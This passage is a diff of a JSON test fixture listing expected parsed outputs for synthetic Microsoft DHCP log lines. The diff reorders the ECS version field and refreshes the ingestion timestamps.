@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-905-50: 50,1/29/16,6:09:59,nnumqua,10.133.8.128,sse3269.invalid,01:00:5e:ce:bf:42,ventore,ivelitse,ritin,uredolor,tatemac", "event": { - "ingested": "2021-06-09T11:57:25.990557Z" + "ingested": "2021-12-14T14:48:14.226920579Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4257-11030: 11030,2/12/16,1:12:33,oremi,10.124.22.221,ciade5699.domain,umq,ntium,psaq,cer", "event": { - "ingested": "2021-06-09T11:57:25.990575Z" + "ingested": "2021-12-14T14:48:14.226923210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5634-62: 62,2/26/16,8:15:08,equepor,10.196.153.12,sequa6540.www5.localhost,01:00:5e:3a:fe:e3,mest", "event": { - "ingested": "2021-06-09T11:57:25.990580900Z" + "ingested": "2021-12-14T14:48:14.226923711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-363-11015: 11015,3/12/16,3:17:42,nci,10.103.162.55,orev6153.internal.domain,deF,sist,nnumqu,iatnu", "event": { - "ingested": "2021-06-09T11:57:25.990585100Z" + "ingested": "2021-12-14T14:48:14.226924100Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4880-57: 57,3/26/16,10:20:16,quipexe,10.162.33.193,agn2581.www5.corp,01:00:5e:ad:16:77,", "event": { - "ingested": "2021-06-09T11:57:25.990589100Z" + "ingested": "2021-12-14T14:48:14.226924471Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6962-57: 57,4/9/16,5:22:51,moenimi,10.156.15.206,enatus2114.mail.home,01:00:5e:33:84:66", "event": { - "ingested": "2021-06-09T11:57:25.990594900Z" + "ingested": 
"2021-12-14T14:48:14.226924834Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5355-60: 60,4/24/16,12:25:25,ntex,10.1.118.72,proident2802.home,01:00:5e:69:9a:1a,eumiu", "event": { - "ingested": "2021-06-09T11:57:25.990599100Z" + "ingested": "2021-12-14T14:48:14.226925210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7417-15: 15,5/8/16,7:27:59,orisn,10.70.235.184,ofdeF7240.www.home,01:00:5e:a2:09:ea,tionulam,uameius,ratio,ptas,nevolu", "event": { - "ingested": "2021-06-09T11:57:25.990602900Z" + "ingested": "2021-12-14T14:48:14.226925565Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5162-59: 59,5/22/16,2:30:33,nci,10.86.118.154,amco5712.www5.localdomain,01:00:5e:35:c0:09,con,uia,quiavo,issusci,mol,taspe,mvolu,radip,tNequ,gelit,tatno", "event": { - "ingested": "2021-06-09T11:57:25.990606700Z" + "ingested": "2021-12-14T14:48:14.226925925Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4141-10: 10,6/5/16,9:33:08,uam,10.5.62.63,llu4762.mail.localdomain,01:00:5e:f5:8e:0d", "event": { - "ingested": "2021-06-09T11:57:25.990610400Z" + "ingested": "2021-12-14T14:48:14.226926983Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5408-15: 15,6/20/16,4:35:42,llumd,10.66.3.197,emaper2638.lan,01:00:5e:0b:42:ab,uaerat,boreet,onev,tenima,laboreet", "event": { - "ingested": "2021-06-09T11:57:25.990613900Z" + "ingested": "2021-12-14T14:48:14.226927361Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5738-11008: 
11008,7/4/16,11:38:16,ccaecat,10.58.0.245,uatDuis2964.test,veri,rsita,siutaliq,exercit", "event": { - "ingested": "2021-06-09T11:57:25.990617800Z" + "ingested": "2021-12-14T14:48:14.226927843Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4243-25: 25,7/18/16,6:40:50,antium,10.103.246.190,iusmodt2597.api.domain,01:00:5e:8b:ba:06,ect,reetdolo,nrepreh,obeataev,lor", "event": { - "ingested": "2021-06-09T11:57:25.990621300Z" + "ingested": "2021-12-14T14:48:14.226928233Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1579-11011: 11011,8/2/16,1:43:25,natura,10.163.217.10,untNequ5075.www5.domain,erep,iutal,dexe,urerep", "event": { - "ingested": "2021-06-09T11:57:25.990625200Z" + "ingested": "2021-12-14T14:48:14.226928585Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3971-56: 56,8/16/16,8:45:59,lorem,10.150.193.226,uidolore6237.internal.local,01:00:5e:42:6c:b4,suntinc,elits,llam,llamcorp,ari,eataevit,uptatev,uovol,dmi,olab,mquisnos", "event": { - "ingested": "2021-06-09T11:57:25.990628700Z" + "ingested": "2021-12-14T14:48:14.226928945Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2933-17: 17,8/30/16,3:48:33,tsed,10.111.61.181,incididu1896.example,01:00:5e:c9:5b:b2,", "event": { - "ingested": "2021-06-09T11:57:25.990632400Z" + "ingested": "2021-12-14T14:48:14.226929298Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5393-11003: 11003,9/13/16,10:51:07,temsequ,10.111.27.193,idexea3181.www.local,tvol,moll,tatione,inB", "event": { - "ingested": "2021-06-09T11:57:25.990636Z" + "ingested": 
"2021-12-14T14:48:14.226929762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4171-16: 16,9/28/16,5:53:42,ntsuntin,10.153.112.62,imav3236.mail.domain,01:00:5e:e7:c7:cb", "event": { - "ingested": "2021-06-09T11:57:25.990639600Z" + "ingested": "2021-12-14T14:48:14.226930121Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7290-32: 32,10/12/16,12:56:16,iam,10.98.34.185,ercit3947.api.local,01:00:5e:a4:f5:60,olupta,turveli,toccae,tatno,nido", "event": { - "ingested": "2021-06-09T11:57:25.990643300Z" + "ingested": "2021-12-14T14:48:14.226930520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4125-53: 53,10/26/16,7:58:50,itlabori,10.252.112.103,usan6343.www5.domain,01:00:5e:10:76:60,ender", "event": { - "ingested": "2021-06-09T11:57:25.990646700Z" + "ingested": "2021-12-14T14:48:14.226930872Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5368-50: 50,11/10/16,3:01:24,atquovo,10.246.117.190,mquaera3924.www5.home,01:00:5e:b9:7e:b1", "event": { - "ingested": "2021-06-09T11:57:25.990650200Z" + "ingested": "2021-12-14T14:48:14.226931236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4173-33: 33,11/24/16,10:03:59,undeo,10.82.52.233,atuse2703.localhost,01:00:5e:fa:2b:37", "event": { - "ingested": "2021-06-09T11:57:25.990653700Z" + "ingested": "2021-12-14T14:48:14.226931598Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5883-52: 
52,12/8/16,5:06:33,ips,10.149.59.28,emporinc5075.internal.host,01:00:5e:37:14:9d,tessec", "event": { - "ingested": "2021-06-09T11:57:25.990657200Z" + "ingested": "2021-12-14T14:48:14.226931956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6446-36: 36,12/23/16,12:09:07,ist,10.169.144.147,onsequat2984.www5.domain,01:00:5e:59:a3:48,", "event": { - "ingested": "2021-06-09T11:57:25.990661Z" + "ingested": "2021-12-14T14:48:14.226932421Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-686-12: 12,1/6/17,7:11:41,nsequu,10.66.168.154,omm4276.www.example,01:00:5e:44:c4:69", "event": { - "ingested": "2021-06-09T11:57:25.990664500Z" + "ingested": "2021-12-14T14:48:14.226932777Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2230-25: 25,1/20/17,2:14:16,torev,10.214.241.84,ctetura4886.www5.lan,01:00:5e:3a:d0:86,ita,ipi,rsitamet,lupt,xea,qua,luptatev,admi,modocons,elaudant,tinvol", "event": { - "ingested": "2021-06-09T11:57:25.990667900Z" + "ingested": "2021-12-14T14:48:14.226933215Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6103-11018: 11018,2/3/17,9:16:50,lapariat,10.97.38.141,etM953.api.domain,xercitat,lpa,entsu,dun", "event": { - "ingested": "2021-06-09T11:57:25.990671400Z" + "ingested": "2021-12-14T14:48:14.226933576Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-927-58: 58,2/18/17,4:19:24,itaut,10.33.140.180,umdolo7781.api.home,01:00:5e:24:f1:b2", "event": { - "ingested": "2021-06-09T11:57:25.990675Z" + "ingested": "2021-12-14T14:48:14.226933955Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4632-51: 51,3/4/17,11:21:59,fugi,10.119.185.63,imadmini2625.www5.localhost,01:00:5e:31:b9:65,dtem", "event": { - "ingested": "2021-06-09T11:57:25.990678600Z" + "ingested": "2021-12-14T14:48:14.226934308Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5377-50: 50,3/18/17,6:24:33,stl,10.95.193.186,picia6119.mail.host,01:00:5e:60:77:c7,tinvol", "event": { - "ingested": "2021-06-09T11:57:25.990682200Z" + "ingested": "2021-12-14T14:48:14.226934665Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5524-11019: 11019,4/2/17,1:27:07,moenimi,10.17.21.125,inv5716.mail.invalid,sequatur,uidolo,lumquido,nihi", "event": { - "ingested": "2021-06-09T11:57:25.990686800Z" + "ingested": "2021-12-14T14:48:14.226935015Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5841-11021: 11021,4/16/17,8:29:41,nofdeF,10.73.69.75,uines6355.internal.localdomain,estqu,inibusBo,tat,tion", "event": { - "ingested": "2021-06-09T11:57:25.990690200Z" + "ingested": "2021-12-14T14:48:14.226935369Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5705-52: 52,4/30/17,3:32:16,uasia,10.64.70.5,ici3995.lan,01:00:5e:4e:97:83,iscinge,atvol,umiur,imad,msequi", "event": { - "ingested": "2021-06-09T11:57:25.990693900Z" + "ingested": "2021-12-14T14:48:14.226935716Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1559-11020: 11020,5/14/17,10:34:50,deFinibu,10.45.25.68,rehender4535.www5.test,hil,atquovo,suntinc,xeac", "event": { - "ingested": 
"2021-06-09T11:57:25.990697500Z" + "ingested": "2021-12-14T14:48:14.226936068Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2228-20: 20,5/29/17,5:37:24,eli,10.28.127.218,pida2286.internal.home,01:00:5e:cc:0b:8f", "event": { - "ingested": "2021-06-09T11:57:25.990701100Z" + "ingested": "2021-12-14T14:48:14.226936538Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7427-11006: 11006,6/12/17,12:39:58,psaquae,10.68.93.6,mporain2624.www.localhost,iunt,temveleu,colabo,eme", "event": { - "ingested": "2021-06-09T11:57:25.990704700Z" + "ingested": "2021-12-14T14:48:14.226936906Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2991-16: 16,6/26/17,7:42:33,civeli,10.116.104.101,gnam2508.mail.example,01:00:5e:e1:73:47,maccusa", "event": { - "ingested": "2021-06-09T11:57:25.990708300Z" + "ingested": "2021-12-14T14:48:14.226937266Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3458-11003: 11003,7/11/17,2:45:07,idex,10.192.110.182,tutla2716.www.domain,inesci,serror,aliqu,olupta", "event": { - "ingested": "2021-06-09T11:57:25.990711900Z" + "ingested": "2021-12-14T14:48:14.226937620Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2807-53: 53,7/25/17,9:47:41,ihilm,10.219.84.37,ercit2385.internal.home,01:00:5e:a0:cd:2f,iamquis", "event": { - "ingested": "2021-06-09T11:57:25.990715700Z" + "ingested": "2021-12-14T14:48:14.226937993Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6972-11012: 
11012,8/8/17,4:50:15,ittenbyC,10.148.153.201,conseq557.mail.lan,aaliquaU,ntor,lpaqui,sitame", "event": { - "ingested": "2021-06-09T11:57:25.990719200Z" + "ingested": "2021-12-14T14:48:14.226938350Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5040-24: 24,8/22/17,11:52:50,utla,10.103.118.137,oei5200.www5.invalid,01:00:5e:c7:b7:18", "event": { - "ingested": "2021-06-09T11:57:25.990722600Z" + "ingested": "2021-12-14T14:48:14.226938701Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2026-02: 02,9/6/17,6:55:24,nnum,10.137.223.15,adol485.example,01:00:5e:81:99:6f,dol", "event": { - "ingested": "2021-06-09T11:57:25.990726200Z" + "ingested": "2021-12-14T14:48:14.226939057Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4977-11019: 11019,9/20/17,1:57:58,que,10.213.147.241,etconse7424.internal.lan,lit,asun,estia,eaq", "event": { - "ingested": "2021-06-09T11:57:25.990729600Z" + "ingested": "2021-12-14T14:48:14.226939404Z" }, - "tags": [ + "ecs": { + "version": "1.12.0" + }, + "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1180-11010: 11010,10/4/17,9:00:32,serunt,10.183.233.5,tMalor7410.www.localhost,eaq,amest,corp,modtemp", "event": { - "ingested": "2021-06-09T11:57:25.990733100Z" + "ingested": "2021-12-14T14:48:14.226939751Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2628-11013: 11013,10/19/17,4:03:07,tNequepo,10.52.186.29,equat2243.www5.localdomain,ione,ihilmole,eriamea,amre", "event": { - "ingested": "2021-06-09T11:57:25.990736800Z" + "ingested": "2021-12-14T14:48:14.226940102Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2949-11: 11,11/2/17,11:05:41,uptat,10.64.199.102,tmo1835.test,01:00:5e:35:a8:83,fugitse", "event": { - "ingested": "2021-06-09T11:57:25.990758400Z" + "ingested": "2021-12-14T14:48:14.226940459Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3331-54: 54,11/16/17,6:08:15,etMalor,10.196.143.87,quatD4191.local,01:00:5e:3b:7a:f1,sperna", "event": { - "ingested": "2021-06-09T11:57:25.990764500Z" + "ingested": "2021-12-14T14:48:14.226940809Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7576-30: 30,12/1/17,1:10:49,tper,10.163.5.243,osqui3661.mail.domain,01:00:5e:1e:d6:07,texp", "event": { - "ingested": "2021-06-09T11:57:25.990769100Z" + "ingested": "2021-12-14T14:48:14.226941161Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5037-11004: 11004,12/15/17,8:13:24,uela,10.194.114.58,ectio2175.www.localhost,ihilmo,radi,gel,lorsitam", "event": { - "ingested": "2021-06-09T11:57:25.990773600Z" + "ingested": "2021-12-14T14:48:14.226941520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6385-1103: 1103,12/29/17,3:15:58,ris,10.212.42.224,liqui6106.internal.home,amvolu,eturadi,uamei,quisno", "event": { - "ingested": "2021-06-09T11:57:25.990777500Z" + "ingested": "2021-12-14T14:48:14.226941873Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1747-11011: 11011,1/12/18,10:18:32,aliquam,10.244.144.198,eratv6205.internal.lan,reme,acommod,uaUteni,udantium", "event": { - "ingested": "2021-06-09T11:57:25.990781400Z" + "ingested": 
"2021-12-14T14:48:14.226942341Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6686-57: 57,1/27/18,5:21:06,stlabo,10.134.192.241,catc6134.localdomain,01:00:5e:5b:99:6c,magnid", "event": { - "ingested": "2021-06-09T11:57:25.990785100Z" + "ingested": "2021-12-14T14:48:14.226942690Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7582-17: 17,2/10/18,12:23:41,quiratio,10.62.191.18,tevelite245.mail.local,01:00:5e:78:a7:55,gnido", "event": { - "ingested": "2021-06-09T11:57:25.990788500Z" + "ingested": "2021-12-14T14:48:14.226943061Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6036-50: 50,2/24/18,7:26:15,numqua,10.89.22.113,abo1637.mail.host,01:00:5e:ed:c2:f7", "event": { - "ingested": "2021-06-09T11:57:25.990791900Z" + "ingested": "2021-12-14T14:48:14.226943436Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4949-11020: 11020,3/11/18,2:28:49,derit,10.90.86.89,piscin6866.internal.host,uptatema,intocc,liqu,eporr", "event": { - "ingested": "2021-06-09T11:57:25.990795500Z" + "ingested": "2021-12-14T14:48:14.226943795Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6418-59: 59,3/25/18,9:31:24,nofdeFin,10.67.38.204,idex6952.www.localhost,01:00:5e:69:58:0e,ecte,tinvolu,iurer,iciadese,quidolor,tessec,olupta,litse,icabo,itatio,uta", "event": { - "ingested": "2021-06-09T11:57:25.990800600Z" + "ingested": "2021-12-14T14:48:14.226944157Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4824-11010: 
11010,4/8/18,4:33:58,volupt,10.158.237.92,riosamn7650.api.test,rcitati,eni,ionevo,ugiatnu", "event": { - "ingested": "2021-06-09T11:57:25.990804300Z" + "ingested": "2021-12-14T14:48:14.226944515Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5368-60: 60,4/22/18,11:36:32,mnisi,10.107.168.60,ehen7519.www5.lan,01:00:5e:a7:ac:70,stquido,ommodico,ptas,pta,tetu", "event": { - "ingested": "2021-06-09T11:57:25.990808Z" + "ingested": "2021-12-14T14:48:14.226944872Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5740-24: 24,5/7/18,6:39:06,Nequepo,10.207.201.9,boree513.www.corp,01:00:5e:e2:17:79,reetdolo,smo,etcons,iusmodi,uamest", "event": { - "ingested": "2021-06-09T11:57:25.990811500Z" + "ingested": "2021-12-14T14:48:14.226945298Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1842-11023: 11023,5/21/18,1:41:41,epte,10.20.147.134,aper5651.test,roi,niamqui,orem,sno", "event": { - "ingested": "2021-06-09T11:57:25.990815100Z" + "ingested": "2021-12-14T14:48:14.226945660Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5263-11007: 11007,6/4/18,8:44:15,saute,10.213.145.202,inventor6088.www.invalid,quamni,iatisu,sec,cons", "event": { - "ingested": "2021-06-09T11:57:25.990818600Z" + "ingested": "2021-12-14T14:48:14.226946009Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-510-20: 20,6/19/18,3:46:49,tae,10.14.81.228,aperiame1458.www5.local,01:00:5e:7e:22:1b", "event": { - "ingested": "2021-06-09T11:57:25.990825300Z" + "ingested": "2021-12-14T14:48:14.226946364Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": 
[ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4410-11003: 11003,7/3/18,10:49:23,itinvol,10.76.10.73,cipitlab6201.www5.example,ios,evolu,ersp,tquov", "event": { - "ingested": "2021-06-09T11:57:25.990828800Z" + "ingested": "2021-12-14T14:48:14.226946736Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4554-01: 01,7/17/18,5:51:58,osquira,10.220.5.143,com5308.api.domain,01:00:5e:55:ee:a4,reetdolo,norum,madmi,uidol,mporin", "event": { - "ingested": "2021-06-09T11:57:25.990832300Z" + "ingested": "2021-12-14T14:48:14.226947082Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3253-ID: ID,8/1/18,12:54:32,roid,10.226.199.190,Nemoenim2039.api.localhost,01:00:5e:f6:ba:65", "event": { - "ingested": "2021-06-09T11:57:25.990835700Z" + "ingested": "2021-12-14T14:48:14.226947447Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1394-11000: 11000,8/15/18,7:57:06,itessequ,10.20.129.206,iquipe2458.api.host,modtemp,quovol,nve,remag", "event": { - "ingested": "2021-06-09T11:57:25.990839100Z" + "ingested": "2021-12-14T14:48:14.226947800Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5983-56: 56,8/29/18,2:59:40,tquiin,10.174.176.36,ovol3674.www5.host,01:00:5e:bb:1d:bf,str,idolore,pid,illoin,tanimid,umdo,natuse,gnamal,metMalo,ntexplic,archite", "event": { - "ingested": "2021-06-09T11:57:25.990842600Z" + "ingested": "2021-12-14T14:48:14.226948153Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7829-32: 
32,9/12/18,10:02:15,asi,10.94.38.110,nisist2752.home,01:00:5e:c1:3c:48,exercita", "event": { - "ingested": "2021-06-09T11:57:25.990846Z" + "ingested": "2021-12-14T14:48:14.226948514Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2516-11007: 11007,9/27/18,5:04:49,oremeu,10.22.110.210,intoc1426.mail.lan,eeufugia,evit,runtm,molli", "event": { - "ingested": "2021-06-09T11:57:25.990849500Z" + "ingested": "2021-12-14T14:48:14.226948876Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-543-11006: 11006,10/11/18,12:07:23,eturadi,10.218.87.174,rsitvolu3751.mail.lan,olor,ineavo,pexe,niamqui", "event": { - "ingested": "2021-06-09T11:57:25.990870500Z" + "ingested": "2021-12-14T14:48:14.226949233Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6846-11014: 11014,10/25/18,7:09:57,adeser,10.140.113.244,tqu4367.www5.localhost,quam,quid,fugiat,atisun", "event": { - "ingested": "2021-06-09T11:57:25.990877100Z" + "ingested": "2021-12-14T14:48:14.226949597Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7741-1103: 1103,11/9/18,2:12:32,dmin,10.159.181.29,inci5738.www5.invalid,rnatur,ofdeFin,essequam,acommo", "event": { - "ingested": "2021-06-09T11:57:25.990881700Z" + "ingested": "2021-12-14T14:48:14.226949954Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-18-11005: 11005,11/23/18,9:15:06,cusant,10.178.173.128,itecto1300.internal.corp,tut,ercita,ciadeser,emquia", "event": { - "ingested": "2021-06-09T11:57:25.990886100Z" + "ingested": "2021-12-14T14:48:14.226950315Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6789-11015: 11015,12/7/18,4:17:40,uia,10.217.38.30,siut1579.www.domain,eFi,mexe,its,ender", "event": { - "ingested": "2021-06-09T11:57:25.990889900Z" + "ingested": "2021-12-14T14:48:14.226950667Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1540-11014: 11014,12/21/18,11:20:14,edic,10.178.49.161,ame6223.www5.localhost,meius,billo,labo,oNemoeni", "event": { - "ingested": "2021-06-09T11:57:25.990893800Z" + "ingested": "2021-12-14T14:48:14.226951149Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2244-32: 32,1/5/19,6:22:49,stenatu,10.215.205.216,ratv5227.www.invalid,01:00:5e:fd:3d:c2,nts", "event": { - "ingested": 